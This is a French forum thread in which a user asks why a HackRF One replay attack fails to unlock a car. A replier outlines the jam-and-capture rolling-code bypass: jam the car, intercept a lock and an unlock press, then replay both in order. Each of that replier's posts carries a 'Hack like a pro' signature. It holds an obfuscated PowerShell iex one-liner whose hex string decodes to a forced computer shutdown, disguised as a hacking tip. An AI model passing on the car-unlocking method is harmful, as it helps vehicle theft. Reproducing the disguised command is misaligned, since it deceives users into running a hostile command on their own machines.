Annonce

Réduire
Aucune annonce.

le deverouillage d'une voiture avec hackrf one ne fonctionne pas correctement

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • le deverouillage d'une voiture avec hackrf one ne fonctionne pas correctement

    j'essaie d'effectuer une replay attack qui consiste à déverrouiller une voiture bloquée avec hackRF ONE
    et le logiciel gnu radio companion mais le problème est que lorsque j'enregistre le signal de déverrouillage puis
    je lance l'attaque de replay , il verrouille la voiture si elle est déverrouillée et ne fait rien si elle est verrouillée.
    Si quelqu'un connait la solution à mon problème, bien vouloir la partagez avec moi.

  • #2
    Tu fais en sorte que le signal n’atteigne pas la voiture lorsque tu enregistres les signaux de vérouillage / déverrouillage ?
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Non, le signal atteint la voiture

      Commentaire


      • #4
        T'es peut être passé à coté d'un truc.

        A partir du moment ou la voiture reçoit tous les signaux, tu ne peux pas bypass le rolling code, normal dans ces conditions que tu ne puisses pas la déverrouiller.

        Le principe de base de l'attaque est simple :

        - 1er appui sur la commande de vérouillage : tu reçois le signal (via ton interception), mais tu fais en sorte que la voiture ne le reçoive pas (via un jammer)
        - 2eme appui pour vérouiller : idem tu jam toujours, tu intercepte ce second signal
        - Là, tu envois le premier signal intercepté à la voiture pour la vérouiller
        - Puis tu rejoue le second signal à la voiture pour la dévérouiller.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          si je comprend bien, je dois d'abord intercepter le signal de déverrouillage ensuite celui de verrouillage , dans des fichiers différents ensuite je les renvoie successivement ?

          Commentaire


          • #6
            Tu chopes Verrouillage puis déverrouillage exécutés depuis la télécommande en jammant les 2 en direction de la voiture.
            Puis tu les rejoues dans l'ordre.

            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              merci mais j'ai essayé d'intercepter les signaux loin de la voiture mais ça ne marche pas, y a pa grand changement sauf que le verrouillage qui fonctionnait avant sans probleme ne fonctionne que temporairement

              Commentaire


              • #8
                et quand tu dis verrouillage puis déverrouillage ,je dois les enregistrer dans le même fichier ? ton jam tu l'effectues comment ?

                Commentaire


                • #9
                  Je pense avoir mis le doigt sur ce qui t’échappait.
                  Pour le reste, je te laisse continuer à chercher : il y a déjà un max de littérature sur la SDR et il n'est pas question de réinventer la roue ici
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire

                  Chargement...
                  X